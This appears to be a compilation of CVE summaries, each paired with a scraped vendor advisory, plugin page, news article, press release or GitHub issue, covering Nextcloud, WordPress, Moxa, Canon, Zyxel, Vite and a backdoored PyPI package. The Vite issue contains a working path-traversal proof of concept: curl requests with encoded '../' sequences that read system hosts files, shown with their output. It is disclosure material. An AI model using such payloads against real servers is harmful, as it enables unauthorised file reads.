Nextcloud Server is a Nextcloud package that handles data storage. Nextcloud Server versions prior to 19.0.11, 20.0.10, or 21.0.2 send user IDs to the lookup server even if the user has no fields set to published. The vulnerability is patched in versions 19.0.11, 20.0.10, and 21.0.2; no workarounds outside the updates are known to exist.

CVE-2021-32653

Authenticated (editor+) Stored Cross-Site Scripting (XSS) vulnerability in Roman Pronskiy's Search Exclude plugin <= 1.2.6 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

With this plugin you can exclude any page, post or whatever from the WordPress search results by checking off the corresponding checkbox on post/page edit page.  
Supports quick and bulk edit.

On the plugin settings page you can also see the list of all the items that are hidden from search.

1.  Upload search-exclude directory to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  Go to any post/page edit page and check off the checkbox Exclude from Search Results if you don’t want the post/page to be shown in the search results

**Does this plugin affect SEO?**

No, it does not affect crawling and indexing by search engines.  
The ONLY thing it does is hiding selected post/pages from your site search page. Not altering SEO indexing.

If you want posts/pages to be hidden from search engines you may add the following snippet to your functions.php:

    function add_meta_for_search_excluded()
    {
        global $post;
        if (false !== array_search($post->ID, get_option('sep_exclude', array()))) {
            echo '<meta name="robots" content="noindex,nofollow" />', "\n";
        }
    }
    add_action('wp_head', 'add_meta_for_search_excluded');
    

Note: already indexed pages will remain indexed for quite a while. In order to remove them from Google index, you may use Google Search Console (or similar tool for other engines).

**Are there any hooks or actions available to customize plugin behaviour?**

Yes.  
There is an action searchexclude_hide_from_search.  
You can pass any post/page/custom\_post ids as an array in the first parameter.  
The second parameter specifies state of visibility in search. Pass true if you want to hide posts/pages,  
or false – if you want show them in the search results.

Example:  
Let’s say you want “Exclude from Search Results” checkbox to be checked off by default  
for newly created posts, but not pages. In this case you can add following code  
to your theme’s function.php:

    add_filter('default_content', 'excludeNewPostByDefault', 10, 2);
    function excludeNewPostByDefault($content, $post)
    {
        if ('post' === $post->post_type) {
            do_action('searchexclude_hide_from_search', array($post->ID), true);
        }
    }
    

Also there is a filter searchexclude_filter_search.  
With this filter you can turn on/off search filtering dynamically.  
Parameters:  
$exclude – current search filtering state (specifies whether to filter search or not)  
$query – current WP\_Query object

By returning true or false you can turn search filtering respectively.

Example:  
Let’s say you need to disable search filtering if searching by specific post\_type.  
In this case you could add following code to you functions.php:

    add_filter('searchexclude_filter_search', 'filterForProducts', 10, 2);
    function filterForProducts($exclude, $query)
    {
        return $exclude && 'product' !== $query->get('post_type');
    }
    

works well for me. I think this is one of those very useful plugins which makes something an expert can do quite easily accessible to novices for free ! Thank you

Super Brilliant Plugin. Helps a lot with SEO + prevents making a mess on the web. Hope you are doing ok. My heart goes out to all suffering in Ukraine. @-/---

I spent an hour trying to hide woocommerce products from my search, added a bunch of code to functions. This baby worked in 30 seconds. Wonderful, thanks!

Simple, light, useful and free. Amazing plugin!

Does the job very well, love the bulk option

Thanks so much for coming up with this. Working in quick edit mode makes it a super star!

Read all 68 reviews

“Search Exclude” is open source software. The following people have contributed to this plugin.

Contributors

**1.2.7**

*   This is a security release. All users are encouraged to upgrade.
*   Fix possible XSS vulnerability.

**1.2.6**

*   Fix compatibility with WordPress 5.5

**1.2.5**

*   Security release. More protection added.

**1.2.4**

*   Security release. All users are encouraged to update.
*   Added filter searchexclude\_filter\_permissions.

**1.2.2**

*   Added action searchexclude\_hide\_from\_search
*   Added filter searchexclude\_filter\_search
*   Fixed Bulk actions for Firefox

**1.2.1**

*   Fixed bug when unable to save post on PHP <5.5 because of boolval() usage

**1.2.0**

*   Added quick and bulk edit support
*   Tested up to WP 4.1

**1.1.0**

*   Tested up to WP 4.0
*   Do not show Plugin on some service pages in Admin
*   Fixed conflict with bbPress
*   Fixed deprecation warning when DEBUG is on

**1.0.6**

*   Fixed search filtering for AJAX requests

**1.0.5**

*   Not excluding items from search results on admin interface

**1.0.4**

*   Fixed links on settings page with list of excluded items
*   Tested up to WP 3.9

**1.0.3**

*   Added support for excluding attachments from search results
*   Tested up to WP 3.8

**1.0.2**

*   Fixed: Conflict with Yoast WordPress SEO plugin

**1.0.1**

*   Fixed: PHP 5.2 compatibility

**1.0**

*   Initial release

CVE-2022-36282: Search Exclude

The trend, spotted by Consumer Reports, could mean good news for organizations struggling to contain remote work challenges.

A survey on US consumer attitudes toward online privacy and security holds some potentially good news for enterprise organizations in an era of work-from-home and hybrid work models.

The survey of 2,103 US adults, conducted by Consumer Reports (CR), showed substantial improvement in consumer cybersecurity and privacy practices over the past three years. Many more individuals appear aware of the security and privacy risks associated with their digital footprint, and have modified their behavior significantly to try and protect it better.

Some of the changes — such as a surge in the use of multifactor authentication (MFA) — appear tied to the fact that more and more organizations require it for accessing online accounts and services. That said, a lot of the behavioral changes are likely also being driven by a higher awareness of cyber-risks, several security experts say.

"The harsh reality is that the explosive growth in ransomware attacks and data breaches has raised awareness of cybersecurity to a level we’ve never seen before," says Darren Guccione, CEO and co-founder at Keeper Security. "When people are unable to get fuel at the gas pump or their bank data is leaked on the Dark Web, they immediately understand the tangible impact cyberattacks can have on their personal lives."

The trend has upside for enterprise organizations that are struggling to contain security challenges tied to the use of insecure home networks and devices by their work-from-home and remote employees. It could mean less of an uphill battle for them, says Brian Dunagan, vice president of engineering at Retrospect, a StorCentric company.

It suggests that people are taking communications regarding security directives seriously and are taking the time to read, learn, and ask questions if necessary — which is a notable shift. 

"Now is the time for security leaders to make the case for increased security budgets, whether it is added personnel or added security technology solutions," Dunagan says.

**Significant Security Improvements for Consumers**

When it comes to better consumer adoption of certain security practices, 88% of survey respondents, for instance, said they use what CR describes as strong passwords — eight characters or more, with upper and lowercase letters, numbers, and symbols — to protect access to their Wi-Fi networks. That's up from 74% in the last survey. Similarly, 85%, up from 69%, have implemented measures such as requiring a password, PIN, TouchID, or FaceID to unlock their smartphone.

The survey revealed a greater understanding among US consumers of the potential privacy and security implications of allowing mobile applications the unfettered ability to track their location and movements. Eighty-one percent of consumers now only allow an app to access their location when they are using the application. Eighty percent claimed they did not install applications that they perceived as collecting too much information about them, and 78% block apps from having access to the camera, location, or contacts if they think the app does not require that access.

The numbers in each instance were significantly higher compared with the 2019 survey. For example, just 60% blocked app access to their cameras and contacts three years ago, and 65% ensured a mobile app had access to their location only when the app was in use.

One of the most significant changes was in the use of multifactor authentication: 77% of survey respondents said they now use MFA, up from 50% in 2019. Security experts consider MFA to be a fundamental security best practice for protecting online accounts against takeover and compromise.

"Many products and companies have started to encourage consumers to enable better cyber hygiene," says Amira Dhalla, director of impact partnerships and programs at Consumer Reports. **"**It's common that when you log in to your bank or email account, they encourage or mandate \[that\] you have to use multifactor authentication."

**Consumers Are More in Control, but Work Needs to Be Done**

Dhalla says that CR's survey showed that consumers overall feel more in control of their personal data because of the steps they are taking to control and secure it. 

“As more security and privacy tools have become available and marketed to everyday consumers, they feel they have more at their disposal to combat the security of their data," she notes. "\[They\] are placing more responsibility on themselves to protect themselves.”

At the same time, they are less secure with how companies are handling and storing their data. At least 75% of the respondents in the CR survey expressed concern about the privacy of personal data that companies collected online. "We know consumers are holding themselves more accountable. They just need knowledge and tools to be able to protect themselves more."

Roger Grimes, data-driven defense evangelist at KnowBe4, perceives the improved consumer habits as the result of a trickle-down effect. "What's largely driving the change is businesses are now taking cybersecurity threats more seriously, which trickles down to consumers because they work for those businesses and are impacted as customers," he says. "If your employer is training you to be more cybersecurity aware on the job, those are also skills you can apply at home and teach to your family."

Grimes says while the trends in the CR survey are encouraging, it's also important to view them in the right perspective. He points to the survey's definition of what constitutes a strong password as one example. "Eight-character passwords, even with complexity, are no longer considered secure," he says. "For someone's password to be truly secure it must be 12 characters or longer and fully random or 20 characters or longer if made up out of someone's head."

Similarly, using MFA alone is not sufficient, if it is not also phishing resistant, he says. "Unfortunately, 90% to 95% of MFA is easily phish-able \[and\] no harder to steal or bypass than a password. Telling people to use any MFA is bad advice."

US Consumers Are Finally Becoming More Security & Privacy Conscious

NPort IAW5000A-I/O Series firmware version v2.2 and prior is affected by a hardcoded credential vulnerabilitywhich poses a potential risk to the security and integrity of the affected device. This vulnerability is attributed to the presence of a hardcoded key, which could potentially facilitate firmware manipulation.



As of June 15, 2022, this site no longer supports Internet Explorer. Please use another browser for the best experience on our site.

**Please sign in**

**SUMMARY**

**NPort IAW5000A-I/O Series Hardcoded Credential Vulnerability**

*   Security Advisory ID: MPSA-230304
*   Version: V1.0
*   Release Date: Aug 16, 2023
*   Reference:
    *   CVE-2023-4204 (cve.org) 

**CVE-2023-4204** 

A vulnerability has been identified in NPort IAW5000A-I/O Series firmware versions prior to v2.2, which poses a potential risk to the security and integrity of the affected device. 

The identified vulnerability types and potential effects are shown below: 

Item

Vulnerability Type

Impact

1

Use of hardcoded credentials 

(CWE-798) 

This vulnerability is attributed to the presence of a hardcoded key, which could potentially facilitate firmware manipulation. 

**AFFECTED PRODUCTS AND SOLUTIONS**

**Affected Products:**

The affected products and firmware versions are shown below.

Product Series

Affected Versions

NPort IAW5000A-I/O Series 

Firmware version 2.2 and prior 

**Solutions:**

Moxa has developed appropriate solutions to address the vulnerability. The solutions for the affected products are shown below: 

Product Series

Solutions

NPort IAW5000A-I/O Series 

Please contact Moxa Technical Support for the security patch.

**Mitigation:**

Moxa recommends users to follow CISA’s recommendations and do the following to mitigate security vulnerabilities. 

1.  Reduce network exposure by ensuring that all control-system devices and systems are not accessible via the Internet. 
    

2.  Place control-system networks and remote devices behind firewalls, isolating them from business networks. 
    

3.  When remote access is necessary, employ secure methods such as Virtual Private Networks (VPNs). It is important to note that VPNs may have vulnerabilities and should be kept up to date with the latest available version. Remember that the security of a VPN depends on the security of its connected devices. 
    

**Products Confirmed Not Vulnerable:**

Only products listed in the Affected Products section of this advisory are known to be affected by this vulnerability. Moxa has confirmed that this vulnerability does not affect the following products: 

*   NPort 5000 (all series), NPort 6000 (all series), NPort Express Series, NPort IA5000 (all series), NPort P5150A Series, NPort S8000 Series, NPort S9000 (all series) 
    

**Revision History:**

VERSION

DESCRIPTION

RELEASE DATE

1.0

First Release

Aug. 16, 2023

**Relevant Products**

NPort IAW5000A-I/O Series ·

*     Print this page
    
*   You can manage and share your saved list in My Moxa
    

**Related Advisories**

*   NPort IAW5000A-I/O Series Serial Device Servers Vulnerabilities
*   NPort IAW5000A-I/O Series Serial Device Server Vulnerabilities
*   NPort IAW5000A-I/O Series Serial Device Servers Vulnerabilities

**Let’s get that fixed**

If you are concerned about a potential cybersecurity vulnerability, please contact us and one of technical support staff will get in touch with you.

Report a Vulnerability

CVE-2023-4204: NPort IAW5000A-I/O Series Hardcoded Credential Vulnerability

Windows Security Support Provider Interface Elevation of Privilege Vulnerability.

CVE-2022-24454

Arbitrary Files can be installed in the Setting Data Import function of Office / Small Office Multifunction Printers and Laser Printers(*). *:Satera LBP660C Series/LBP620C Series/MF740C Series/MF640C Series firmware Ver.11.04 and earlier sold in Japan. Color imageCLASS LBP660C Series/LBP 620C Series/X LBP1127C/MF740C Series/MF640C Series/X MF1127C firmware Ver.11.04 and earlier sold in US. i-SENSYS LBP660C Series/LBP620C Series/MF740C Series/MF640C Series, C1127P, C1127iF, C1127i firmware Ver.11.04 and earlier sold in Europe.

2023年4月14日  
キヤノンマーケティングジャパン株式会社  

平素はキヤノン製品をご愛用いただき誠にありがとうございます。

スモールオフィス向け複合機、レーザービームプリンターおよびインクジェットプリンターの一部製品に複数の脆弱性が発見されました。

これらの脆弱性は、有線ルーターあるいはWi-Fiルーターなどを介さないでインターネットに直接接続している場合、インターネット上の第三者に任意のコードを実行される、またはサービス運用妨害（DoS）攻撃を受ける可能性があるというものです。  
また、RemoteUIの認証不備により、任意のファイルをインストールされる可能性があるという問題です。

*   CVE-2023-0851
*   CVE-2023-0852
*   CVE-2023-0853
*   CVE-2023-0854
*   CVE-2023-0855
*   CVE-2023-0856
*   CVE-2022-43974
*   CVE-2022-43608

_制御プロトコルにおけるシステム管理者の初期登録時の問題_

*   CVE-2023-0857

*   CVE-2023-0858

*   CVE-2023-0859

**安心して製品をお使いいただくために**

本脆弱性を利用した被害は現時点で確認されておりませんが、より安心して製品をお使いいただくため、お持ちの対象製品を最新のファームウエアへアップデートいただきますようお願いいたします。

あわせて、製品はインターネットに直接接続せず、ファイアーウォール製品や有線ルーターあるいはWi-Fiルーターで構築した安全なプライベートネットワークでインターネットにアクセスできる環境で、プライベートIPアドレスを設定してご使用ください。

詳細は以下の「ネットワークに接続される製品のセキュリティについて」をご参照ください。

今後とも引き続き、安心してキヤノン製品をご利用いただきますようお願い申し上げます。

**対策が必要なスモールオフィス向け複合機、レーザービームプリンターおよびインクジェットプリンター**

**スモールオフィス向け複合機・レーザービームプリンター**

**対象機種**

スモールオフィス向け複合機・レーザービームプリンターの対象機種については、下記からご確認ください。

**ファームウエアダウンロード**

各製品の最新ファームウエアは下記よりダウンロードをお願い致します。

**インクジェットプリンター**

**CVE-2022-43974**

*   GX4030
*   G3370
*   PIXUS XK110
*   PIXUS TS8630

**ファームウエアアップデート手順**

インクジェットプリンターのファームウエアのアップデート手順については下記よりご確認ください。

上記以外の製品の脆弱性については、確認がとれ次第、こちらのページで速やかにご案内致します。

CVE-2023-0859: スモールオフィス向け複合機、レーザービームプリンターおよびインクジェットプリンターに関する脆弱性対応について｜サポート

A post-authentication command injection vulnerability in the CLI command of Zyxel ZyWALL/USG series firmware versions 4.20 through 4.72, VPN series firmware versions 4.30 through 5.32, USG FLEX series firmware versions 4.50 through 5.32, and ATP series firmware versions 4.32 through 5.32, which could allow an authenticated attacker with administrator privileges to execute OS commands.

**CVE: CVE-2022-38547****Summary**

Zyxel has released patches for firewalls affected by a post-authentication remote code execution (RCE) vulnerability. Users are advised to install them for optimal protection.

**What is the vulnerability?**

The post-authentication RCE vulnerability in the CLI command of some firewall versions could allow an authenticated attacker to execute some OS commands remotely. Note that WAN access is disabled by default on the firewall devices.

**What versions are vulnerable—and what should you do?**

After a thorough investigation, we’ve identified the vulnerable products that are within their vulnerability support period and released patches to address the vulnerability, as shown in the table below.

Affected series

Affected version

Patch availability

ATP

ZLD V4.32~V5.32

ZLD V5.35

USG FLEX

ZLD V4.50~V5.32

ZLD V5.35

VPN

ZLD V4.30~V5.32

ZLD V5.35

ZyWALL/USG

ZLD V4.20~V4.72

ZLD V4.73

**Got a question?**

Please contact your local service rep or visit Zyxel’s Community for further information or assistance.

**Acknowledgment**

Thanks to atdog from TRAPA Security for reporting the issue to us.

**Revision history**

2023-2-7: Initial release

**Have a question?**

We are always here to help!

Contact us

CVE-2022-38547: Zyxel security advisory for post-authentication RCE in firewalls | Zyxel Networks

Vitejs Vite before v2.9.13 was discovered to allow attackers to perform a directory traversal via a crafted URL to the victim's service.

**Describe the bug**

The vulnerability found at #2820 was found to be not fixed properly, which leads to the unrestricted directory traversal.

Currently the @fs directory does check for the allowed path, but it does not check for encoded paths.

For example, assuming that /@fs/home/test/ is the only allowed path, this can be bypassed by accessing /@fs/home/test/%2e%2e%2f%2e%2e%2f, which translates to /@fs/home/test/../../ internally.

Since this way of access through the browser may output an inconsistent result, curl --path-as-is can be used as an alternative way to reproduce such issue.

**Reproduction**

Any vite project is affected by this vulnerability.

npm init @vitejs/app app
cd app
npm install
npm run dev

**Reproduction in Windows**

Accessing C:/Windows/System32/drivers/etc/hosts is blocked since the allow list only contains C:/Users/stypr/Desktop/development/q/vite-project.

$ curl --path-as-is -v "http://localhost:3001/@fs/C:/Windows/System32/drivers/etc/hosts"
\*   Trying ::1:3001...
\*   Trying 127.0.0.1:3001...
\* Connected to localhost (127.0.0.1) port 3001 (#0)
\> GET /@fs/C:/Windows/System32/drivers/etc/hosts HTTP/1.1
\> Host: localhost:3001
\> User-Agent: curl/7.75.0
\> Accept: \*/\*
\>
\* Mark bundle as not supporting multiuse
< HTTP/1.1 403 Forbidden
< Access-Control-Allow-Origin: \*
< Date: Wed, 08 Jun 2022 04:00:32 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
< Transfer-Encoding: chunked
<

    <body\>
      <h1>403 Restricted</h1>
      <p\>The request url "C:/Windows/System32/drivers/etc/hosts" is outside of Vite serving allow list.<br/><br/\>\- C:/Users/stypr/Desktop/development/q/vite-project<br/><br/\>Refer to docs https://vitejs.dev/config/#server-fs-allow for configurations and more details.</p>
      <style\>
        body {
          padding: 1em 2em;
        }
      </style\>
    </body\>
  \* Connection #0 to host localhost left intact
  \* 

What if we access like C:/Users/stypr/Desktop/development/q/vite-project/../../../../../../Windows/System32/drivers/etc/hosts? In typical cases, this doesn't work

However, if we replace the path ../ as %2e%2e%2f and replace every trailing slashes to %2f, the check is bypassed and the path traversal becomes successful.

$ curl --path-as-is -v "http://localhost:3001/@fs/C:/Users/stypr/Desktop/development/q/vite-project/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fSystem32%2fdrivers%2fetc%2fhosts"
\*   Trying ::1:3001...
\*   Trying 127.0.0.1:3001...
\* Connected to localhost (127.0.0.1) port 3001 (#0)
\> GET /@fs/C:/Users/stypr/Desktop/development/q/vite-project/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fSystem32%2fdrivers%2fetc%2fhosts HTTP/1.1
\> Host: localhost:3001
\> User-Agent: curl/7.75.0
\> Accept: \*/\*
\>
\* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: \*
< Content-Length: 824
< Content-Type:
< Last-Modified: Tue, 31 May 2022 03:15:34 GMT
< ETag: W/"824-1653966934106"
< Cache-Control: no-cache
< Date: Wed, 08 Jun 2022 03:53:26 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
<
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost
\*a Connection #0 to host localhost left intact

**Reproduction in Linux**

Linux is also pretty much the same, you can first get the whitelist path (/srv/q/app) by accessing a random path(/@fs/...), and then do a path traversal based on the given whitelist.

curl -v --path-as-is "http://192.168.125.129:3000/@fs/srv/q/app/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts"
\*   Trying 192.168.125.129:3000...
\* TCP\_NODELAY set
\* Connected to 192.168.125.129 (192.168.125.129) port 3000 (#0)
\> GET /@fs/srv/q/app/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts HTTP/1.1
\> Host: 192.168.125.129:3000
\> User-Agent: curl/7.68.0
\> Accept: \*/\*
\> 
\* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: \*
< Content-Length: 221
< Content-Type: 
< Last-Modified: Tue, 30 Jun 2020 09:41:51 GMT
< ETag: W/"221-1593510111311"
< Cache-Control: no-cache
< Date: Wed, 08 Jun 2022 04:09:49 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
< 
127.0.0.1	localhost
127.0.1.1	ubuntu

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
\* Connection #0 to host 192.168.125.129 left intact

**System Info**

Windows

  System:
    OS: Windows 10 10.0.19044
    CPU: (16) x64 AMD Ryzen 7 3800X 8-Core Processor
    Memory: 33.13 GB / 63.93 GB
  Binaries:
    Node: 16.13.2 - C:\\Program Files\\nodejs\\node.EXE
    Yarn: 1.22.10 - ~\\AppData\\Roaming\\npm\\yarn.CMD
    npm: 8.1.2 - C:\\Program Files\\nodejs\\npm.CMD
  Browsers:
    Edge: Spartan (44.19041.1266.0), Chromium (102.0.1245.33)    
    Internet Explorer: 11.0.19041.1566
  npmPackages:
    @vitejs/plugin-vue: ^2.3.3 =\> 2.3.3
    vite: ^2.9.9 =\> 2.9.10

Linux

      System:
        OS: Linux 5.13 Ubuntu 20.04.3 LTS (Focal Fossa)
        CPU: (6) x64 AMD Ryzen 7 3800X 8-Core Processor
        Memory: 12.21 GB / 15.59 GB
        Container: Yes
        Shell: 5.0.17 - /bin/bash
      Binaries:
        Node: 14.18.3 - /usr/bin/node
        Yarn: 1.22.10 - /usr/bin/yarn
        npm: 6.14.15 - /usr/bin/npm
      Browsers:
        Chrome: 97.0.4692.99
        Firefox: 100.0.2
    

**Used Package Manager**

npm

**Validations**

*   Follow our Code of Conduct
*   Read the Contributing Guidelines.
*   Read the docs.
*   Check that there isn't already an issue that reports the same bug to avoid creating a duplicate.
*   Make sure this is a Vite issue and not a framework-specific issue. For example, if it's a Vue SFC related bug, it should likely be reported to https://github.com/vuejs/core instead.
*   Check that this is a concrete bug. For Q&A open a GitHub Discussion or join our Discord Chat Server.
*   The provided reproduction is a minimal reproducible example of the bug.

CVE-2022-35204: Unrestricted directory traversal with `@fs` (Bypass) · Issue #8498 · vitejs/vite

The d8s-file-system package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-hashes package. The affected version is 0.1.0.

Democritus functions\[1\] for working with files and directories.

\[1\] Democritus functions are _simple, effective, modular, well-tested, and well-documented_ Python functions.

We use d8s (pronounced "dee-eights") as an abbreviation for democritus (you can read more about this here).

Once imported, you can use any of the functions listed below.

*   def is\_file(path: str) \-> bool:
        """Determine if the given path is a file."""
    
*   def file\_read(file\_path: str) \-> str:
        """Read the file at the given file\_path as a string."""
    
*   def file\_read\_bytes(file\_path: str) \-> bytes:
        """Read the file at the given file\_path as bytes."""
    
*   def file\_write(file\_path: str, file\_contents: Any) \-> bool:
        """Write the given content to the file at the given path (including a file name)."""
    
*   def file\_append(file\_path: str, file\_contents: Any) \-> bool:
        """Append the given content to the file at the given path (including a file name)."""
    
*   def file\_move(starting\_path: str, destination\_path: str):
        """Move the file from the starting path to the destination path."""
    
*   def file\_copy(starting\_path: str, destination\_path: str, \*, preserve\_metadata: bool \= False):
        """Copy the file from the starting\_path to the destination path."""
    
*   def file\_delete(file\_path: str):
        """Delete the given file."""
    
*   def file\_owner\_name(file\_path: str) \-> str:
        """Find the owner of the file at the given path."""
    
*   def file\_change\_owner(file\_path: str):
        """Change the ownership of the given file."""
    
*   def file\_ssdeep(file\_path: str) \-> str:
        """Find the ssdeep fuzzy hash of the file."""
    
*   def file\_md5(file\_path: str) \-> str:
        """Find the md5 hash of the given file."""
    
*   def file\_sha1(file\_path: str) \-> str:
        """Find the sha1 hash of the given file."""
    
*   def file\_sha256(file\_path: str) \-> str:
        """Find the sha256 hash of the given file."""
    
*   def file\_sha512(file\_path: str) \-> str:
        """Find the sha512 hash of the given file."""
    
*   def file\_name\_escape(file\_name\_arg: str) \-> str:
        """Escape the name of a file so that it can be used as a file name in a file path."""
    
*   def file\_name(file\_path: str) \-> str:
        """Find the file name from the given file path."""
    
*   def file\_name\_windows(windows\_file\_path: str) \-> str:
        """Find the file name from the given windows\_file\_path."""
    
*   def file\_name\_unix(unix\_file\_path: str) \-> str:
        """Find the file name from the given unix\_file\_path."""
    
*   def file\_size(file\_path: str) \-> int:
        """Find the file size."""
    
*   def file\_directory(file\_path: str) \-> str:
        """Return the directory in which the given file resides."""
    
*   def file\_details(file\_path: str) \-> Dict\[str, Union\[str, int\]\]:
        """Get file hashes and file size for the given file."""
    
*   def file\_exists(file\_path: str) \-> bool:
        """Check if the file exists."""
    
*   def file\_is\_readable(file\_path: str) \-> bool:
        """Check if the file is readable."""
    
*   def file\_is\_writable(file\_path: str) \-> bool:
        """Check if the file is writable."""
    
*   def file\_is\_executable(file\_path: str) \-> bool:
        """Check if the file is executable."""
    
*   def file\_contains(file\_path: str, pattern: str, \*, pattern\_is\_regex: bool \= False) \-> bool:
        """Return whether or not the file contains the given pattern."""
    
*   def file\_search(file\_path: str, pattern: str, \*, pattern\_is\_regex: bool \= False) \-> List\[str\]:
        """Search for the given pattern in the file."""
    
*   def file\_name\_matches(file\_path: str, pattern: str) \-> bool:
        """Return whether or not the file name contains the given pattern."""
    
*   def is\_directory(path: str) \-> bool:
        """Determine if the given path is a directory."""
    
*   def directory\_exists(directory\_path: str) \-> bool:
        """Check if the directory exists."""
    
*   def directory\_file\_names(directory\_path: str, \*, recursive: bool \= False) \-> List\[str\]:
        """List files at the given directory\_path."""
    
*   def directory\_file\_paths(directory\_path: str, \*, recursive: bool \= False) \-> List\[str\]:
        """List the file paths at the given directory\_path."""
    
*   def directory\_copy(src\_path: str, dst\_path: str):
        """Copy the directory from the src\_path to the destination path."""
    
*   def directory\_delete(directory\_path: str):
        """Delete the given directory."""
    
*   def directory\_create(directory\_path: str, mode\=0o777):
        """Create a directory."""
    
*   def directory\_disk\_usage(directory\_path: str):
        """Return the disk usage for the given directory."""
    
*   def directory\_disk\_free\_space(directory\_path: str):
        """Return the free space in the given directory."""
    
*   def directory\_disk\_used\_space(directory\_path: str):
        """Return the used space in the given directory."""
    
*   def directory\_disk\_total\_space(directory\_path: str):
        """Return the total space in the given directory."""
    
*   def home\_directory() \-> str:
        """Return the home directory."""
    
*   def home\_directory\_join(path: str) \-> str:
        """Join the given path with the home directory."""
    
*   def directory\_move(src\_path: str, dst\_path: str):
        """Move the directory from the src\_path to the dst\_path."""
    
*   def directory\_files\_details(directory\_path: str, \*, recursive: bool \= False) \-> Dict\[str, Dict\[str, Union\[str, int\]\]\]:
        """Return the file details for each file in the directory at the given path."""
    
*   def directory\_files\_read(directory\_path: str, \*, recursive: bool \= False) \-> Iterable\[Tuple\[str, str\]\]:
        """Read all files in the directory\_path."""
    
*   def directory\_subdirectory\_names(directory\_path: str, \*, recursive: bool \= False) \-> List\[str\]:
        """List the names of all subdirectories in the given directory."""
    
*   def directory\_files\_containing(
        directory\_path: str, pattern: str, \*, pattern\_is\_regex: bool \= False, recursive: bool \= False
    ) \-> Dict\[str, List\[str\]\]:
        """Search for the given pattern in all files in the given directory\_path."""
    
*   def directory\_file\_paths\_matching(directory\_path: str, pattern: str, \*, recursive: bool \= False) \-> List\[str\]:
        """Return the paths of all of the files in the given directory which match the pattern."""
    
*   def directory\_file\_names\_matching(directory\_path: str, pattern: str, \*, recursive: bool \= False) \-> List\[str\]:
        """Return the names of all of the files in the given directory which match the pattern."""
    
*   def directory\_read\_files\_with\_path\_matching(
        directory\_path: str, pattern: str, \*, recursive: bool \= False
    ) \-> Iterable\[Tuple\[str, str\]\]:
        """Read all of the files in the given directory whose paths match the given pattern."""
    
*   def atomic\_write(fpath, \*, overwrite: bool \= True, \*\*cls\_kwargs):
        """Create a context manager to write atomically using the AtomicWriterPerms class to update file permissions."""
    

👋  If you want to get involved in this project, we have some short, helpful guides below:

If you have any questions or there is anything we did not cover, please raise an issue and we'll be happy to help.

CVE-2022-42041: d8s-file-system

Expansion includes new capabilities for hybrid deployment models and industrial Internet of things (IIoT) environments.

ATHENS, Greece, May 17, 2022 /PRNewswire/ -- Barracuda Discover.22 EMEA Partner Conference --

**Highlights:**

*   Cloud-native Secure Access Service Edge (SASE) platform from Barracuda now supports hybrid cloud environments, enabling deployments in Microsoft Azure and at the private service edge.
*   Barracuda provides industry-leading, highly scalable connectivity and security support for the industrial internet of things (IIoT). Technology integrations with FireMon, Skybox, TTTech, and Nozomi further expand the scope of security services.
*   Barracuda's Zero Trust Access solution is now simpler to deploy, leveraging a new virtual deployment with integrated directory connectors.

Barracuda Networks, Inc., a leading provider of cloud-first security solutions, today announced the expansion of its cloud-native SASE platform. Barracuda's SASE platform streamlines Secure SD-WAN, firewall-as-a-service, Zero Trust Network Access, and Secure Web Gateway functionality and incorporates secure connectivity to industrial IoT devices. The expansion includes new capabilities for hybrid deployment models and IIoT environments. Additionally, new technology integrations offer secure data transfer, orchestration, asset management, and anomaly detection.

**According to Gartner®**, "By 2024, 80% of SD-WAN deployments will incorporate security service edge (SSE) requirements, up from less than 25% in 2022."1

As part of the Barracuda SASE platform, CloudGen WAN, Barracuda's Secure SD-WAN service and firewall-as-a-service, now provides private service edge for hybrid deployments. Private service edge is ideal for organizations that need to follow certain geopolitical requirements or need full control over the data plane. Private service edge devices provide the same scope of security and networking functionality as the cloud service and are administrated and maintained via a central management platform.

Barracuda CloudGen WAN now offers Secure Connector virtual appliances and new ruggedized site devices. These updates provide highly scalable internet-of-things connectivity, as well as cloud and private service edge-based security for IIoT endpoints. The Secure Connector endpoint virtual agent can be deployed in Docker environments for a wide range of third-party IIoT solutions.

To meet the specific challenges and requirements of digitalization and the internet of things, Barracuda integrates with specialized technology partners, including FireMon, Skybox, TTTech, and Nozomi. These integrations provide the ability for customers to enable secure data transfer, take advantage of automated incident response, and align with the latest IIoT security standards.

Zero Trust Access is often the first step toward SASE. As part of Barracuda's SASE platform, Barracuda CloudGen Access now offers new tools and capabilities that radically simplify deployments. CloudGen Access is now available with a turnkey proxy for simple deployment and cloud user directory connector for easy sync of users and groups.

**Quotes:  
**"The expansion of Barracuda's cloud-native SASE platform for hybrid deployment models and IIoT environments solves a number of common security, connectivity, and scalability challenges that businesses are facing in this age of digital transformation," **said Tim Jefferson, SVP, Engineering for Data, Network, and Application Security at Barracuda.** "Today's announcement underscores Barracuda's ongoing commitment to collaborate with specialized technology partners to develop tailored solutions, integrate advanced technologies, and expand the capabilities of our cloud-first offerings."

